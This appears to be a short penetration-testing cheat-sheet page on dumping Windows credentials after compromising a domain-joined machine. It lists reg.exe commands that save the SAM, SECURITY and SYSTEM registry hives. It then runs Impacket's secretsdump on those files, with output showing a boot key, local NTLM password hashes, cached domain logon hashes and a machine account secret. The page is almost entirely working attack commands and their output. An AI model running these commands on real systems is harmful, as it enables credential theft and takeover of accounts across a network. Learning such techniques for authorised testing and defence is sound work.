Dumping Windows Credentials
PE after compromised a AD Windows service

Dumping the NTLM Hash

Registry Hives

Get a copy of the SYSTEM, SECURITY and SAM hives
1
C:\> reg.exe save hklm\sam c:\temp\sam.save
2
C:\> reg.exe save hklm\security c:\temp\security.save
3
C:\> reg.exe save hklm\system c:\temp\system.save
Copied!

Password Hashes

Get the password hashes or the LSA secrets in a single run with secretsdump
1
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
2
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies
3
4
[*] Target system bootKey: 0x602e8c2947d56a95bf9cfad9e0bbbace
5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
6
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
7
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
8
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
9
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
10
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
11
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
12
[*] Dumping LSA Secrets
13
[*] $MACHINE.ACC
14
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
Copied!
Last modified 1yr ago